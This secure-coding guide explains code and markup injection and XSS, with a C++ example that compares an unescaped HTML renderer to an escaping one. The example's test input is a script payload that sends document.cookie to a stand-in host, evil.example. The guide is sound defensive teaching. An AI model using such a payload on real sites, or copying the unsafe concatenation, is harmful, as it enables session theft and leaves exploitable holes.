Code and Markup Injection

Care must be taken when constructing statements that are passed to an interpreter (a shell, an SQL engine, a browser's HTML parser) and arbitrary strings are put inside them, whether by string interpolation, concatenation or other methods. If those strings are subject to input from the outside world (including the users), then a specially crafted string can change the structure of the statement, so that the interpreter executes arbitrary commands and the system is exploited.

An example of this is outputting HTML using fprintf(file_handle, "<p>%s</p>\n", paragraph_text); or my_file_fh << "<p>" << paragraph_text << "</p>" << std::endl; without escaping paragraph_text first. If paragraph_text is user-controlled, it can carry arbitrary markup, including a <script> element, and the JavaScript inside it runs in the victim's browser with the page's privileges, where it can steal passwords or session cookies, or alter the page's contents (this is cross-site scripting, or XSS). The remedy is to escape the text for the context it is placed in (here, HTML element content), or to generate the output with a templating library that does so by default.
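The following is an added example, not code from the original page: it places the vulnerable C++ stream pattern from the paragraph above beside a hardened version that escapes the text before splicing it into the markup. The html_escape helper, the render_paragraph_* functions and the attacker input are all constructed for this example.

```cpp
#include <iostream>
#include <string>

// Minimal escaper for text placed in HTML element content (between tags).
// Helper written for this example; it is not from the original page.
// It handles the five characters that can change the HTML structure.
std::string html_escape(const std::string &in) {
    std::string out;
    out.reserve(in.size());
    for (char c : in) {
        switch (c) {
            case '&':  out += "&amp;";  break;
            case '<':  out += "&lt;";   break;
            case '>':  out += "&gt;";   break;
            case '"':  out += "&quot;"; break;
            case '\'': out += "&#39;";  break;
            default:   out += c;        break;
        }
    }
    return out;
}

// The pattern described in the text: user text spliced straight into markup.
std::string render_paragraph_unsafe(const std::string &paragraph_text) {
    return "<p>" + paragraph_text + "</p>\n";
}

// Hardened form: escape for the element-content context, then splice.
std::string render_paragraph_safe(const std::string &paragraph_text) {
    return "<p>" + html_escape(paragraph_text) + "</p>\n";
}

// Crude check used only to make the difference visible: did a <script>
// start tag that our template never emits end up in the output?
bool contains_script_tag(const std::string &html) {
    return html.find("<script") != std::string::npos;
}

int main() {
    // Constructed attacker input, as it might arrive from a comment form.
    const std::string paragraph_text =
        "Nice post!<script>new Image().src="
        "'http://evil.example/?c='+encodeURIComponent(document.cookie)</script>";

    std::cout << "Unsafe: " << render_paragraph_unsafe(paragraph_text);
    std::cout << "Safe:   " << render_paragraph_safe(paragraph_text);
    std::cout << "Unsafe output contains a script tag: "
              << (contains_script_tag(render_paragraph_unsafe(paragraph_text)) ? "yes" : "no")
              << "\n";
    std::cout << "Safe output contains a script tag:   "
              << (contains_script_tag(render_paragraph_safe(paragraph_text)) ? "yes" : "no")
              << "\n";
    return 0;
}
```

Note that this escaper is only correct for element content. Text placed inside an attribute value, inside a <script> block, or inside a URL needs the escaping rules of that context, which is why a templating engine that knows the output context is preferable to hand-rolled escaping.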

For more information, see:

  1. “Code/Markup Injection and Its Prevention” resource on the Perl beginners site.

  2. Wikipedia articles about SQL injection and Cross-site scripting.

  3. The site Bobby Tables about SQL injections.